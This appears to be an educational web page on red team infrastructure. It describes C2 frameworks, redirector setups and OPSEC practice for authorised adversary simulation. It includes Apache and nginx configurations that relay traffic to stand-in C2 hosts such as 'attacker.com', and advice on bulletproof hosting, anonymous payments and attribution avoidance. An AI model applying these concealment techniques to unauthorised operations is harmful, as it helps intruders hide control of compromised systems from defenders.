What is Red Team Infrastructure?
Red team infrastructure forms the backbone of adversarial simulation operations, providing command and control (C2), payload delivery, and operational security capabilities. Modern red team infrastructure must be resilient, attribution-resistant, and capable of evading sophisticated detection systems while maintaining reliable communication with compromised assets.
Key components include C2 frameworks like Cobalt Strike, Covenant, and Empire, along with supporting infrastructure such as domain fronting, redirectors, payload hosting, and operational security measures. Proper infrastructure design balances functionality, stealth, and cost-effectiveness while minimizing attribution risk.
Red Team Infrastructure Calculator
Monthly Cost: $1,525
Total Servers: 10
Assessment: Highly Resilient
Command & Control Frameworks
Cobalt Strike
Commercial C2 framework with advanced post-exploitation capabilities.
• Advanced evasion techniques
• Team collaboration features
• Extensive payload options
• Commercial support and updates
Covenant
Open-source .NET C2 framework with web-based interface.
• Web-based management
• Built-in OPSEC features
• Modular payload system
• Active development community
Empire
PowerShell-based post-exploitation framework for Windows.
• Extensive module library
• Cryptographically secure
• Multi-platform support
• REST API interface
Mythic
Cross-platform C2 framework with containerized architecture.
• Multiple agent types
• Web-based interface
• Extensible plugin system
• Multi-operator support
Infrastructure Components
Domain Fronting
Technique that uses legitimate CDN domains to hide C2 traffic behind trusted services.
# Apache redirector configuration
<VirtualHost *:443>
ServerName legitimate-business.com
DocumentRoot /var/www/html
# Proxy malicious requests to C2
ProxyPreserveHost On
ProxyRequests Off
# Domain fronting rules
RewriteEngine On
RewriteCond %{HTTP_HOST} ^evil-c2.com$ [NC]
RewriteRule ^(.*)$ https://c2-backend.attacker.com$1 [P,L]
# Legitimate traffic handling
RewriteRule ^(.*)$ /var/www/html$1 [L]
</VirtualHost>C2 Redirectors
Intermediate servers that relay C2 traffic while hiding the actual C2 infrastructure.
# Nginx redirector configuration
server {
listen 443 ssl;
server_name redirector.example.com;
ssl_certificate /etc/ssl/certs/cert.pem;
ssl_certificate_key /etc/ssl/private/key.pem;
# C2 traffic redirection
location /api/ {
proxy_pass https://c2-server.internal:443;
proxy_ssl_verify off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
# Hide server headers
proxy_hide_header Server;
proxy_hide_header X-Powered-By;
}
# Legitimate content for non-C2 requests
location / {
root /var/www/html;
index index.html;
}
}Automated Infrastructure Deployment
Infrastructure-as-Code approach for rapid, consistent red team infrastructure deployment.
Ansible → Server configuration
Docker → Containerized C2 deployment
Let's Encrypt → Automated SSL certificates
Real-World Infrastructure Examples
Enterprise Red Team
Large-scale infrastructure for testing Fortune 500 company defenses.
- • 5 geographically distributed C2 servers
- • 15 redirectors across multiple CDNs
- • Automated infrastructure rotation every 48 hours
- • Domain categorization and reputation management
Government Red Team
High-security infrastructure for testing critical government systems.
- • Air-gapped C2 servers in secure facilities
- • Custom-developed C2 frameworks
- • Multi-layer encryption and attribution avoidance
- • Formal infrastructure approval and auditing
Financial Services Red Team
Compliance-focused infrastructure for regulated financial environments.
- • Regulatory-compliant hosting and logging
- • Business-categorized domains and certificates
- • Extensive documentation and audit trails
- • Integration with security orchestration platforms
Healthcare Red Team
Safety-focused infrastructure for testing medical device security.
- • Isolated network segments for safety
- • Non-disruptive testing methodologies
- • HIPAA-compliant data handling
- • Emergency cutoff and rollback procedures
OPSEC and Attribution Avoidance
Infrastructure OPSEC
- • Use multiple layers of redirectors and never connect directly to C2
- • Implement domain fronting and CDN-based traffic hiding
- • Rotate infrastructure regularly and burn compromised assets
- • Use legitimate business categorization for domains and IPs
- • Implement proper SSL/TLS certificates from trusted CAs
- • Monitor infrastructure for detection and compromise indicators
Attribution Avoidance
- • Use bulletproof hosting services and anonymous payments
- • Implement WHOIS privacy protection and proxy registrations
- • Avoid patterns in domain names, IP ranges, and infrastructure
- • Use VPN chains and anonymous communication methods
- • Implement infrastructure automation to reduce human touch points
- • Maintain operational security for team communications
Red Team Infrastructure Best Practices
✅ Do
- • Implement defense in depth with multiple infrastructure layers
- • Use Infrastructure-as-Code for consistent, repeatable deployments
- • Maintain detailed operational security procedures and checklists
- • Implement automated monitoring and alerting for infrastructure health
- • Use legitimate business domains and proper SSL certificates
- • Plan for infrastructure burning and rapid redeployment scenarios
❌ Don't
- • Connect directly to C2 servers from operator workstations
- • Reuse infrastructure components across different engagements
- • Use predictable patterns in domain names or infrastructure layout
- • Ignore infrastructure operational security and attribution risks
- • Deploy infrastructure without proper monitoring and alerting
- • Use unencrypted or poorly secured communication channels